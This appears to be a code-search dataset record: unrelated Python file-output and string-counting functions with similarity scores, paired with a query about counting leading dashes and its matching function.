write_SEQRES_fasta():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n with open(filepath,'r') as file:\n seq_list = []\n for line in file:\n if line[:6] == 'SEQRES':\n line_split = line.split()[4:]\n seq_list.append(line_split)\n choice1 = input('Enter name of the outfile: ') \n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as outfile:\n for i in seq_list:\n outfile.writelines(i)\n print('Sequences successfully written!')\n \n with open(choice, 'r') as myfile:\n header = ''\n for line in myfile:\n if line.startswith(\"TITLE\"): \n head_split = line.split()\n header = header + ' '.join(head_split[1:])\n \n choice2 = input('Enter output file name with a .fasta extension: ')\n filepath2 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice2)\n z = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(z, 'r') as file:\n with open(filepath2, 'w') as output:\n for i in file:\n output.writelines('>' + header + '\\n' + i)\n print('>' + header + '\\n' + i)\n print('Fasta file generated!')", "def _reportFileAnalytics(self, sourceFiles, outputFile, language):\n \n #is this a single file or a set of files?\n bSingleFile = len(sourceFiles) == 1\n \n #open the output file for appending\n f=self.openFile(outputFile, \"a\") #open for appending\n f.write ('<font face=\"verdana\" color=\"' + AutoGrader.Const.HEADER_COLOR1 + '\">')\n f.write ('<br>\\n=======================================================<br>\\n')\n if bSingleFile:\n f.write(sourceFiles[0]) #if this is a single file, simply output its name\n else: #if these are multiple files, list the directory name in bold\n f.write('<b>' + os.path.split(sourceFiles[0])[0] + '</b>') #directory name in bold\n f.write ('<br>\\n=======================================================<br>\\n</font>')\n\n #for each file, report the analytics\n for sourceFile in sourceFiles:\n if bSingleFile == False: #only print the filename if we have more than 1 file in the list\n f.write ('<font face=\"verdana\" color=\"' + AutoGrader.Const.HEADER_COLOR1 + '\">')\n f.write(os.path.split(sourceFile)[1] + '</font><br>\\n')\n \n if language == 'C++':\n numLines, numComments = self.analyzeCppCode(sourceFile)\n f.write ('<font face=\"courier\" color=\"' + AutoGrader.Const.ANALYTICS_COLOR1 + '\">Code Lines: ' + str(numLines))\n f.write ('<br>\\n~#Comments: ' + str(numComments) + '<br>\\n')\n \n if language == 'Python':\n numLines, numDocStr, numComments, numDefs, numClasses = self.analyzePythonCode(sourceFile)\n f.write ('<font face=\"courier\" color=\"' + AutoGrader.Const.ANALYTICS_COLOR1 + '\">Code Lines: ' + str(numLines))\n f.write (AutoGrader.Const.HTML_TAB_CHAR*2 + '~#Functions: ' + str(numDefs))\n f.write (AutoGrader.Const.HTML_TAB_CHAR*2 + '~#Classes: ' + str(numClasses))\n f.write ('<br>\\n~#Comments: ' + str(numComments))\n f.write (AutoGrader.Const.HTML_TAB_CHAR*2 + '~#DocStrs: ' + str(numDocStr) + '<br>\\n')\n \n f.write('</font><br>') #skip a line between entries\n f.close()", "def concatenate_processed_text(self):\n\n\n\t\tconcatenated_text = \"\"\n\t\tfor line in self.processed_text:\n\t\t\tconcatenated_text += \" \".join(line) + \" \"\n\n\n\t\t# Remove the trailing space character from the concatenated string\n\t\t# of words.\n\t\tconcatenated_text = concatenated_text[:-1]\n\n\t\tself.concatenated_text = concatenated_text", "def outputFunc(filename, resultList):\n #assert len(parks) == 3\n \n f = open(filename, 'wt')\n \n try:\n writer = csv.writer(f)\n for i in range(len(resultList)):\n print resultList[0]\n writer.writerow(resultList[i])\n \n finally:\n f.close()", "def write_output(self):\n with open(self.filename, 'a', newline='', encoding='utf-8') as \\\n csv_file:\n csv_writer = csv.writer(csv_file)\n if os.stat(self.filename).st_size == 0:\n # if the csv file needs a headers\n csv_writer.writerow(Configurations.header)\n for quote in self.quotes_objects:\n csv_writer.writerow(quote.info)", "def reformat_file(inFile, outFile):\n \n with open(outFile, \"w\") as outHandle:\n \n\t\t# write header line\n\t\toutLine = [\"g1\", \"g2\", \"raw_count\", \"log(obs/exp)\"]\n\t\t\n\t\toutHandle.write(\"\\t\".join(outLine) + \"\\n\")\n\n\n\t\tfor i, line in enumerate(open(inFile)):\n\t\t\t\n\t\t\tif not i == 0:\n\t\t\t\t\n\t\t\t\tsp = line.strip().split(\"\\t\")\n\t\t\t\t\n\t\t\t\t# get row interaction counts and normalized obs/exp values\n\t\t\t\trawCount = sp[12]\n\t\t\t\tobsExp = sp[13]\n\t\t\t\t\n\t\t\t\tgenes1 = sp[4].split(\"|\")\n\t\t\t\tgenes2 = sp[10].split(\"|\")\n\t\t\t\t\n\t\t\t\t#~ print(g1, g2, rawCount)\n\t\t\t\t\n\t\t\t\t# iterate over all pairs\n\t\t\t\tfor g1 in genes1:\n\n\t\t\t\t\tfor g2 in genes2:\n\t\t\t\t\t\t\n\t\t\t\t\t\toutLine = [g1, g2, rawCount, obsExp]\n\t\t\t\t\t\t\n\t\t\t\t\t\toutHandle.write(\"\\t\".join(outLine) + \"\\n\")", "def convert(sInFile, sOutFile = None, bReport = True):\r\n\r\n\t# Globals\r\n\tglobal pOutFile\r\n\r\n\t# File jiggery.\r\n\tif not sOutFile:\r\n\t\tsOutFile = sInFile.replace(\".\", \"_dtemp.\")\r\n\r\n\t# Some initial state and a line counter.\r\n\tendComment()\r\n\tbInComment = False\r\n\tiLine = 0\r\n\tiComments = 0\r\n\tiStartTime = time.clock()\r\n\r\n\t# Open the files.\r\n\tpOutFile = open(sOutFile, \"w\")\r\n\twith open(sInFile) as pIn:\r\n\t\t\t\t\t\t\t\t \r\n\t\t# For each line in the file.\r\n\t\tfor sLine in pIn:\r\n\r\n\t\t\t# Increment counter.\r\n\t\t\tiLine += 1\r\n\t\t\t\t\t\t\t\t \r\n\t\t\t# If we are in a comment, handle the line.\r\n\t\t\tif bInComment:\r\n\t\t\t\tbInComment = handleCommentLine(sLine, iLine)\r\n\r\n\t\t\t# Check the new line to see if it opens a comment line.\r\n\t\t\telif OPEN_COMMENT in sLine:\r\n\t\t\t\tiComments += 1\r\n\t\t\t\tbInComment = handleCommentLine(sLine, iLine)\r\n\r\n\t\t\t# We are neither a comment so write the line back to the source.\r\n\t\t\telse:\r\n\t\t\t\tpOutFile.write(sLine)\r\n\r\n\t# Close the output file.\r\n\tpOutFile.close()\r\n\t\r\n\t# Backup the old file.\r\n\t#shutil.copy(sInFile, sInFile + \"_dbackup\")\r\n\t\r\n\t# Copy the new file over the old file.\r\n\tshutil.copy(sOutFile, sInFile)\r\n\t\r\n\tos.remove(sOutFile)\r\n\t\r\n\t# Report.\r\n\tif bReport:\r\n\t\tprint sInFile\r\n\t\tprint str(iComments) + \" comment blocks converted within \"+str(iLine)+\" lines in approx \"+str(round(time.clock() - iStartTime, 2))+\" seconds.\"", "def generate(self, fileName):\n self.preProcess()\n styleFile = open(fileName, 'w')\n # write head part\n head = \"\"\"#!/usr/bin/env python\n\nimport os\n\nfrom WMQuality.Code import Code\n\n# output of the log files\n# prefix of the files in cvs\n# quality script for using pylint:\nqualityScript = '%s'\n# output file:\nqualityReport = '%s'\n# rating threshold (min: 0, max 10)\nthreshold = %s\n\npackages = {\\\\\n \"\"\" % (self.script, self.report, self.threshold)\n styleFile.writelines(head)\n styleFile.writelines('\\n')\n\n for moduleName in self.module.keys():\n # find the one with the most votes per module:\n # register this.\n styleFile.writelines(\" '\" + moduleName + \"':'\" + self.module[moduleName] + \"',\\\\\\n\")\n styleFile.writelines('}\\n')\n tail = \"\"\"\ncode = Code(qualityScript, qualityReport, WMCore.WMInit.getWMBASE(), threshold, packages)\ncode.run()\ncode.summaryText()\n \"\"\"\n styleFile.writelines(tail)\n styleFile.close()", "def minify(infile, outfile, max_width):\n\n source = infile.read()\n statement_list = scan_for_statements(source)\n line_list = build_output_line_list(statement_list, max_width)\n outfile.write(ATASCII_LINEFEED.join(line_list))", "def ReadIndex_text(indexfile, isPrintWarning = False):#{{{\n# return (indexList, headerinfo, dbfileindexList)\n indexList = []\n idList = []\n v1 = array('B') # dbfile index\n v2 = array('L') # offset\n v3 = array('I') # block size\n apd1 = idList.append\n apd2 = v1.append\n apd3 = v2.append\n apd4 = v3.append\n indexFileHeaderText = []\n origdbname=\"\"\n origversion=\"\"\n origext=\"\"\n origprefix=\"\"\n try:\n\n hdl = mybase.ReadLineByBlock(indexfile)\n lines = hdl.readlines()\n while lines != None:\n for line in lines:\n if not line or line[0] == \"#\":\n continue\n strs = line.split()\n if strs[0] == \"DEF_DBNAME\":\n if len(strs)>=2:\n origdbname=strs[1]\n elif strs[0] == \"DEF_VERSION\":\n if len(strs)>=2:\n origversion=strs[1]\n elif strs[0] == \"DEF_EXTENSION\":\n if len(strs)>=2:\n origext=strs[1]\n elif strs[0] == \"DEF_PREFIX\":\n if len(strs)>=2:\n origprefix = strs[1]\n else:\n apd1(strs[0])\n apd2(int(strs[1]))\n apd3(int(strs[2]))\n apd4(int(strs[3]))\n lines = hdl.readlines()\n\n indexList.append(idList)\n indexList.append(v1)\n indexList.append(v2)\n indexList.append(v3)\n\n headerinfo = (origdbname, origversion, origext, origprefix)\n\n numRecord = len(idList)\n lastDBFileIndex = v1[numRecord-1]\n dbfileindexList = list(range(lastDBFileIndex+1))\n\n if isPrintWarning:\n if origversion == \"\":\n msg = \"{}: Warning! No version info in the index file {}\"\n print(msg.format(sys.argv[0],indexfile), file=sys.stderr)\n elif origversion != version:\n msg = \"{}: Warning! Version conflicts. \"\\\n \"Version of the index file {} ({}) \"\\\n \"!= version of the program ({})\"\n print(msg.format(sys.argv[0],indexfile,\n origversion, version), file=sys.stderr)\n return (indexList, headerinfo, dbfileindexList)\n except IOError:\n msg = \"Failed to read index file {} in function {}\"\n print(msg.format(indexfile, sys._getframe().f_code.co_name), file=sys.stderr)\n return (None, None, None)", "def condolidateReads(options):\n input_filename=options.adapter_trimmed_filename\n output_filename=options.consolidated_filename\n fhw=open(output_filename,\"w\")\n #original_data=readFastqFile(input_filename)\n fhr=open(input_filename,\"r\")\n data={}\n while True:\n line=fhr.readline().strip()\n if not line:\n break\n id=line\n seq=fhr.readline().strip()\n useless=fhr.readline()\n quality=fhr.readline()\n if seq not in data:\n data[seq]=1\n else:\n data[seq]+=1\n for seq_num,seq in enumerate(data):\n fhw.write(\">read_\"+str(seq_num+1)+\"_\"+str(data[seq])+\"\\n\"+seq+\"\\n\")\n fhw.close()", "def writing_get_game(file_name, title):\n result = str(reports.get_game(file_name, title))\n with open (\"report_for_judy_part2.txt\", \"+a\") as f:\n f.write(result)\n f.write(\"\\n\")", "def openie_process_output(openie_out: str, outfile: str):\n tuples = 0\n with open(openie_out, 'r') as f_out, open(outfile, 'w') as f_conv:\n writer = csv.writer(f_conv, delimiter='\\t')\n writer.writerow(['document id',\n 'subject',\n 'predicate',\n 'predicate lemmatized',\n 'object',\n 'confidence',\n 'sentence'])\n for idx, line in enumerate(f_out):\n tuples += 1\n components = line.strip().split(\"\\t\")\n # e.g. first line looks like /tmp/tmpwi57otrk/input/1065332.txt (so pmid is between last / and .)\n doc_id = components[0].split(\"/\")[-1].split('.')[0]\n subj = components[2].lower()\n pred = components[3].lower()\n obj = components[4].lower()\n conf = components[11].replace(',', '.')\n sent = components[-5]\n pred_lemma = components[-2]\n\n res = [doc_id, subj, pred, pred_lemma, obj, conf, sent]\n writer.writerow([str(t) for t in res])\n\n logging.info('{} lines written'.format(tuples))", "def report(self, fileName = None):\n\n header = ARCPY.GetIDMessage(84200)\n columns = [ARCPY.GetIDMessage(84191), ARCPY.GetIDMessage(84201), \n ARCPY.GetIDMessage(84202)]\n results = [ columns ]\n for case in self.uniqueCases:\n if not self.caseField:\n strCase = \"ALL\"\n else:\n strCase = UTILS.caseValue2Print(case, self.caseIsString)\n cfOIDs, minSumDist = self.cf[case]\n cfOIDs = [ str(i) for i in cfOIDs ]\n cfOIDs = \", \".join(cfOIDs)\n rowResult = [ strCase, \n cfOIDs,\n LOCALE.format(\"%0.6f\", minSumDist) ]\n results.append(rowResult)\n\n outputTable = UTILS.outputTextTable(results, header = header)\n if fileName:\n f = UTILS.openFile(fileName, \"w\")\n f.write(outputTable)\n f.close()\n else:\n ARCPY.AddMessage(outputTable)", "def _write_to_file(self):\n with open(self.filename + \".ir\", \"w+\") as file:\n file.writelines(\n [\"\\n\" + l if p != 0 else l for p, l in enumerate(self.lines)]\n )", "def scrapeFacebookComments(file_id, result_file, access_token):\n with open(file_id, 'r', encoding='utf8') as f, \\\n open(result_file, 'w', encoding='utf8', newline='') as o:\n input_file = csv.DictReader(f)\n output_file = csv.DictWriter(o, \n fieldnames=[\n 'sentence_id', \n 'sentence_text'])\n\n output_file.writeheader()\n\n num_processed = 0\n scrape_starttime = datetime.datetime.now()\n base = \"https://graph.facebook.com/v2.12\"\n parameters = \"/?access_token={}\".format(access_token)\n\n print(\"Scraping {} Comments: {}\\n\".format(\n file_id, scrape_starttime))\n\n comment_contents = {}\n\n for row in input_file:\n if row['comment_id'] in comment_contents:\n comment = comment_contents[row['comment_id']]\n else:\n node = \"/{}\".format(row['comment_id'])\n url = base + node + parameters\n reply = request_until_succeed(url)\n \n if not reply:\n print(\"Comment doesn't exists anymore: \" + row['comment_id'])\n continue\n \n try:\n comment = json.loads(reply)\n except:\n comment = json.loads(reply.decode('utf-8')) #python 3.5 and earlier bugfix\n comment_contents[row['comment_id']] = comment # cache result in case of reuse\n\n comment_message = '' if 'message' not in comment \\\n or comment['message'] is '' else \\\n unicode_decode(comment['message'])\n\n sentence_texts = sent_tokenize(comment_message,\n language='german')\n sentence_text = sentence_texts[int(row['sentence_number'])]\n\n ha = hashlib.md5(sentence_text.encode()).hexdigest()\n\n if ha != row['md5_hash']:\n print(\"Wrong MD5 hash for comment: \" + row['comment_id'] + \", \" + sentence_text)\n continue\n\n output_file.writerow({'sentence_id': row['sentence_id'],\n 'sentence_text': sentence_text})\n\n num_processed += 1\n if num_processed % 100 == 0:\n print(\"{} Comments Processed: {}\".format(\n num_processed, datetime.datetime.now()))\n\n print(\"\\nDone!\\n{} Comments Processed in {}\".format(\n num_processed, datetime.datetime.now() - scrape_starttime))", "def postprocess_cga(lines, outfile):\n pattern = re.compile(\"^\\s*([0-9,]+)\\s+\\([ 0-9.]+%\\)\\s+Source/(\\S+):(\\S+)\\(.*\\).*$\")\n\n totalCost = 0.0\n functionTable = []\n functionMap = {}\n\n for line in lines:\n line = line.strip()\n match = pattern.match(line)\n if not match:\n continue\n\n cost = float(match.group(1).replace(\",\", \"\"))\n sourceFile = match.group(2)\n function = match.group(3)\n\n # Filter out library code we don't want to change\n if function.startswith(\"stbi__\"):\n continue\n\n totalCost += cost\n\n # Accumulate the scores from functions in multiple call chains\n if function in functionMap:\n index = functionMap[function]\n functionTable[index][1] += cost\n functionTable[index][2] += cost\n # Else add new functions to the end of the table\n else:\n functionMap[function] = len(functionTable)\n functionTable.append([function, cost, cost])\n\n # Sort the table by accumulated cost\n functionTable.sort(key=lambda x: 101.0 - x[2])\n\n for function in functionTable:\n function[2] /= totalCost\n function[2] *= 100.0\n\n with open(outfile, \"w\") as fileHandle:\n\n totals = 0.0\n for function in functionTable:\n # Omit entries less than 1% load\n if function[2] < 1:\n break\n\n totals += function[2]\n fileHandle.write(\"%5.2f%% %s\\n\" % (function[2], function[0]))\n\n fileHandle.write(\"======\\n\")\n fileHandle.write(f\"{totals:5.2f}%\\n\")", "def gen_solve_to_text(self):\n\n count = 0\n self.url = \"scramble: \\n\"\n for move in self.scramble.split():\n self.url += \"{} \".format(move)\n self.url += \"\\n\\nsolve:\\n\"\n\n for move in self.solve_stats:\n if self.comms_unparsed_bool:\n if move[\"comment\"] != \"\":\n if \"mistake\" in move[\"comment\"]:\n move[\"comment\"] = \"{}\\n//{}\".format(move[\"comment\"].split(\"mistake\")[0], \"mistake from here\")\n if \"#\" in move[\"comment\"]:\n piece = move[\"comment\"].split(\"#\")[0]\n move[\"comment\"] = move[\"comment\"].split(\"#\")[1]\n if self.url.rfind(\"\\n\") != -1:\n alg = self.url[self.url.rfind(\"\\n\") + 1:]\n self.url = self.url[:self.url.rfind(\"\\n\") + 1] + \"\\n//{}\\n\".format(piece) + alg\n self.url += self.comms_unparsed[count]\n count += 1\n self.url += \"// {} \\n\".format(move[\"comment\"])\n else:\n if \"move\" in move:\n if move[\"move\"] != \"\":\n self.url += \"{} \".format(move[\"move\"])\n if move[\"comment\"] != \"\":\n if \"mistake\" in move[\"comment\"]:\n move[\"comment\"] = \"{}\\n//{}\".format(move[\"comment\"].split(\"mistake\")[0], \"mistake from here\")\n if \"#\" in move[\"comment\"]:\n piece = move[\"comment\"].split(\"#\")[0]\n move[\"comment\"] = move[\"comment\"].split(\"#\")[1]\n if self.url.rfind(\"\\n\") != -1:\n alg = self.url[self.url.rfind(\"\\n\") + 1:]\n self.url = self.url[:self.url.rfind(\"\\n\") + 1] + \"//{}\\n\".format(piece) + alg\n\n self.url += \"// {} \\n\".format(move[\"comment\"])\n else:\n self.url += \"// {} \\n\".format(move[\"comment\"])", "def __str__(self):\r\n # this will hold the output lines while we are generating them\r\n output_lines = []\r\n\r\n # Build an ordered list of headers\r\n # 2. The optional columns in the mapping file\r\n headers_present = self._metadata.iteritems().next()[1].keys()\r\n optional_headers = list(set(headers_present) -\r\n set(self.req_header_prefix +\r\n self.req_header_suffix))\r\n\r\n headers = (self.req_header_prefix + optional_headers +\r\n self.req_header_suffix)\r\n\r\n output_lines.extend(self.Comments)\r\n output_lines.append('#' + '\\t'.join(headers))\r\n\r\n for sample_id, data in self._metadata.iteritems():\r\n current_data = []\r\n\r\n # Get the first required columns\r\n current_data.append(sample_id)\r\n # skip the SampleID required header, since we get that from the\r\n # dict we are currently iterating over\r\n for header in self.req_header_prefix[1:]:\r\n current_data.append(data[header])\r\n\r\n # Get the optional columns; allow for None in these columns\r\n for header in optional_headers:\r\n value = self.no_data_value if data[header] is None else \\\r\n data[header]\r\n\r\n current_data.append(value)\r\n\r\n # get the last required columns\r\n for header in self.req_header_suffix:\r\n current_data.append(data[header])\r\n\r\n output_lines.append('\\t'.join([str(x) for x in current_data]))\r\n\r\n return '\\n'.join(output_lines) + '\\n'", "def write_results(chunks, accession_db, tax_db, taxonomy_file):\n try:\n with open(taxonomy_file, \"wt\") as output:\n #output.write(\"gi\\ttaxid\\t{0}\\n\".format(\";\".join(ranks)))\n output.write(\"accession\\ttaxid\\tAnnotation\\n\")\n for accession in chunks:\n taxids = accession_db.taxid(accession)\n for tax in taxids:\n lineage = tax_db.lineage_name(tax[1], reverse=True)\n if lineage:\n output.write(\"{0[0]}\\t{0[1]}\\t{1}\\n\".format(\n tax, \";\".join(lineage)))\n except IOError:\n sys.exit(\"Error cannot open {0}\".format(taxonomy_file))" ]
[ "0.60390484", "0.599767", "0.5916299", "0.5812747", "0.56795824", "0.5623025", "0.54872257", "0.5453515", "0.5433996", "0.53970265", "0.53352237", "0.5327005", "0.5286181", "0.5284214", "0.5239452", "0.522815", "0.5226091", "0.5211899", "0.52046853", "0.51947665", "0.5192673", "0.5184921", "0.51769", "0.5173248", "0.5169315", "0.51682836", "0.51660895", "0.5158815", "0.5147907", "0.51409143", "0.51317394", "0.51250976", "0.5121139", "0.51140594", "0.5110773", "0.5108708", "0.5096325", "0.5096041", "0.5093406", "0.50932103", "0.50901115", "0.50898755", "0.508971", "0.50888723", "0.5080861", "0.50806975", "0.5079697", "0.50768155", "0.5074366", "0.50647086", "0.5063497", "0.5060274", "0.5058169", "0.50555205", "0.5047074", "0.50458807", "0.504586", "0.504466", "0.5044409", "0.5037497", "0.5036867", "0.5033993", "0.5022252", "0.50190175", "0.5017851", "0.50090605", "0.50053227", "0.50003123", "0.49988276", "0.49949187", "0.4991584", "0.4989504", "0.49822435", "0.4976393", "0.4968116", "0.49633968", "0.496124", "0.49560708", "0.49367806", "0.49339706", "0.493086", "0.49247238", "0.49229756", "0.49217606", "0.49214646", "0.49204448", "0.4918466", "0.49149147", "0.4906527", "0.4900174", "0.4899131", "0.48941708", "0.48903373", "0.48893827", "0.4888658", "0.48844495", "0.4882481", "0.48715347", "0.48670706", "0.48660883" ]
0.5896646
3
Helper function for counting leading ""s
def leading(self, string: str) -> int: leading_amount = 0 while string[leading_amount] == "-": leading_amount += 1 return leading_amount
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def find_blank(bd):\n count = 0\n for num in bd:\n if num == \" \":\n return count\n else:\n count += 1", "def linecount(x):\n return sum(1 for char in x if char == \"\\n\")", "def test_number_start_word():\n assert syllapy.count(\"4dog\") == 0", "def srow(string, i):\r\n return string.count('\\n', 0, max(0, i)) + 1", "def _getNumberOfSpaces(self, str):\n\t\tnum = 0\n\t\tfor char in str:\n\t\t\tif char is \" \":\n\t\t\t\tnum += 1\n\t\treturn num", "def count_abbas(str):\r\n i = 0\r\n count = 0\r\n for i in range(0, len(str)):\r\n if str.startswith(\"abba\", i):\r\n count += 1\r\n return count", "def heading_count(self, phrase,char='~'):\r\n count = 0\r\n for x in phrase:\r\n if x != char:\r\n break\r\n count+=1\r\n return count,phrase[count:]", "def start_with_the_beggining(rna: str):\n return 0", "def count_common_prefix(str_seq, prefix):\r\n\r\n count = 0\r\n for element in str_seq:\r\n if element.startswith(prefix):\r\n count += 1\r\n return count", "def test_single_letter_count(self):\n self.assertEqual(functions.single_letter_count(\"Hello World\", \"h\"), 1)\n self.assertEqual(functions.single_letter_count(\"Hello World\", \"z\"), 0)\n self.assertEqual(functions.single_letter_count(\"HelLo World\", \"l\"), 3)", "def count_dashes(txt):\n count = 0\n for c in txt:\n if c == '-':\n count += 1\n return count", "def test_number_in_word():\n assert syllapy.count(\"d0g\") == 0", "def len(string):\n l = 0\n skip = False\n for c in string:\n if skip:\n if c == 'm':\n skip = False\n else:\n if c == '\\x1b':\n skip = True\n else:\n l += 1\n return l", "def nextString(self, s, start):\r\n parens = 0\r\n quotes = 0\r\n\r\n for pos in range(start,len(s)):\r\n c = s[pos]\r\n if c == \",\" and parens == 0 and quotes == 0:\r\n return pos+1\r\n elif c == \"(\" and quotes == 0:\r\n parens += 1\r\n elif c == \")\" and quotes == 0:\r\n parens -= 1\r\n elif c == \"\\'\" and quotes == 0:\r\n quotes = 1\r\n elif c ==\"\\'\" and quotes == 1:\r\n quotes = 0\r\n \r\n return len(s)+1", "def header_len(fname,header_char='#'):\n Nheader = 0\n with open(fname) as f:\n for i, l in enumerate(f):\n if ( (l[0:len(header_char)]==header_char) or (l==\"\\n\") ):\n Nheader += 1\n else:\n break\n\n return Nheader", "def COUNTBLANK(count_list):\n if type(count_list) == list:\n cnt = 0\n for i in range(len(count_list)):\n if count_list[i] == '':\n cnt += 1\n return(cnt)\n else:\n print('Invalid type: count_list must be a list.')", "def sticky_count_wrapper(fwd_str):\n length = len(fwd_str)\n count = 0\n rev_index = length-1\n for index in range(length/2):\n # print fwd_str[index], \" \", fwd_str[rev_index - index]\n if get_opposite_character(fwd_str, index) is not fwd_str[rev_index-index]:\n # print \"Breaking the Code :\",get_opposite_character(fwd_str, index), \" is not equal to \",\n # fwd_str[rev_index - index]\n break\n count += 1\n return count", "def __count_text(text, limit=None):\n\n count = 0\n is_text = True\n for i, c in enumerate(text):\n if is_text and c == '\\33':\n is_text = False\n\n if is_text:\n count += 1\n if limit is not None and count == limit:\n return i + 1\n\n if not is_text and c == 'm':\n is_text = True\n\n if limit is not None:\n return len(text)\n else:\n return count", "def count_indents(text):\n t = re.match(r'^( *)', text)\n return len(t.group(0))", "def test_number_end_word():\n assert syllapy.count(\"dog123\") == 0", "def count(text):\n return len(text)", "def calculate_line_number(text):\n return len([line for line in text.split(\"\\n\") if line.strip() != \"\"])", "def length(s: str) -> int:\n count = 0\n for i in s:\n count += 1\n return count", "def num_length(full):\n length = 0\n while length < len(full) and (is_int(full[length]) or full[length] == \".\"):\n length += 1\n return length", "def test_aabcdd():\n assert part_01.count_for('abbcdd', 2) == 1\n assert part_01.count_for('aabcdd', 3) == 0", "def num_trailing_zeros(val):\n val = str(val)\n counter = 0\n\n for char in reversed(val):\n if char == \".\" or char != \"0\" : break\n elif char == \"0\" : counter += 1\n\n return counter", "def _getNewCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"-\"):\n nb_lines += 1\n return nb_lines", "def get_indent(self, s):\n return len(s) - len(s.lstrip())", "def kncount(self, string, prefixes=None): ###\n if prefixes == None:\n prefixes = list(self.dist(\"\").keys())\n return sum([self.count(p + string) >= 1 for p in prefixes])", "def count_exclamations(txt):\n count = 0\n for c in txt:\n if c == '!':\n count += 1\n return count", "def sentence_count(self):\n count = 0\n for line in self.lines:\n if '.' in line:\n count += 1\n if count == 0:\n count = 1\n return count\n #return line.count('.')\n #else:\n #return 1", "def linecounter(x):\n return linecount(x) + longlines(x)", "def count_valid(message, prefix):\n return 3", "def get_num_bucket_names(file_name, start_after_value, start_after_line_num, prefix_postfix_option, acronyms_only_option):\n num_bucket_names = 0\n found_start = True\n if start_after_line_num or start_after_value:\n found_start = False\n\n f = open(file_name, \"r\")\n for index, line in enumerate(f):\n line = line.strip()\n if not found_start:\n if start_after_line_num == (index + 1) or start_after_value == line:\n found_start = True\n continue\n else:\n num_bucket_names += len(get_string_variations(line.strip(), prefix_postfix_option, acronyms_only_option))\n return num_bucket_names", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def count_hi(str):\n return str.count(\"hi\")", "def test_character_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[1], 133)", "def count_indents(text):\n counts = 0\n for char in text:\n if char.isspace() and char != \"\\t\" and char !=\"\\n\":\n counts += 1\n elif char.isalpha():\n break\n return counts", "def test_line_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[0], 4)", "def test_ababab():\n assert part_01.count_for('ababab', 2) == 0\n assert part_01.count_for('ababab', 3) == 1", "def _getOldCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"+\"):\n nb_lines += 1\n return nb_lines", "def part1(fname: str) -> int:\n return sum(len(set(''.join(group))) for group in get_data(fname))", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def next_section_start_pos(text, start):\n section_re = re.compile(\"^.*\\n-+$\", re.I|re.MULTILINE) \n next_section = section_re.search(text, start)\n return len(text) if next_section is None else next_section.start()", "def count_periods(txt):\n count = 0\n for c in txt:\n if c == '.':\n count += 1\n return count", "def sections(self) -> int:\n return len(self.string.split(\".\"))", "def count(self):\n string_count = 0\n string = ['abc', 'xyz', 'aba', '1221']\n for elements in string:\n length = len(elements) \n if length >= 2:\n if elements[0] == elements[-1]: \n string_count +=1\n print(\"String count :\", string_count)", "def true_length(self,str):\n\t\treturn len(re.sub(r'#\\[.*?\\]','',str))", "def getAlphaNumCharCount(sdata):\n\tacount = 0\n\tncount = 0\n\tscount = 0\n\tocount = 0\n\tassertEqual(type(sdata), str, \"input must be string\")\n\tfor c in sdata:\n\t\tif c.isnumeric():\n\t\t\tncount += 1\n\t\telif c.isalpha():\n\t\t\tacount += 1\n\t\telif c.isspace():\n\t\t\tscount += 1\n\t\telse:\n\t\t\tocount += 1\n\tr = (acount, ncount, ocount)\n\treturn r", "def find_sentence_length(s):\n count = 1\n for c in s:\n if c == ' ':\n count += 1\n elif c == '.' or c == '?' or c == '!':\n return count\n return count", "def nwords(s: str):\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZÄÜÖabcdefghijklmnopqrstuvwxyzüäö\"\n take = 0\n skip = 0\n for i in s:\n if i not in letters:\n skip += 1\n #print(\"S:\", skip)\n else:\n take += 1\n #print(\"t:\", take)\n res = (len(s) - take) + 1\n return res", "def __count_commas__(test_str: str) -> int:\n i = test_str.find(\",\")\n if i == -1:\n return 0\n return 1 + MachineInterface.__count_commas__(test_str[i+1:])", "def count_num_ones_in_a_row(bit_string) -> int:\n\n longest_ones_row: int = 0\n\n current_ones_row: int = 0\n\n for b in bit_string:\n if b == \"1\":\n current_ones_row += 1\n else:\n current_ones_row = 0\n\n if current_ones_row > longest_ones_row:\n longest_ones_row = current_ones_row\n\n return longest_ones_row", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 11)", "def common_prefix_length(s, u):\n length = 0\n for cs, cu in zip(s, u):\n if cs != cu:\n break\n length += 1\n return length", "def test_count_gaps(self):\n self.assertEqual(self.RNA(\"\").count_gaps(), 0)\n self.assertEqual(self.RNA(\"ACUGUCAGUACGHSDKCUCDNNS\").count_gaps(), 0)\n self.assertEqual(self.RNA(\"GUACGUACAKDC-SDHDSK\").count_gaps(), 1)\n self.assertEqual(self.RNA(\"-DSHUHDS\").count_gaps(), 1)\n 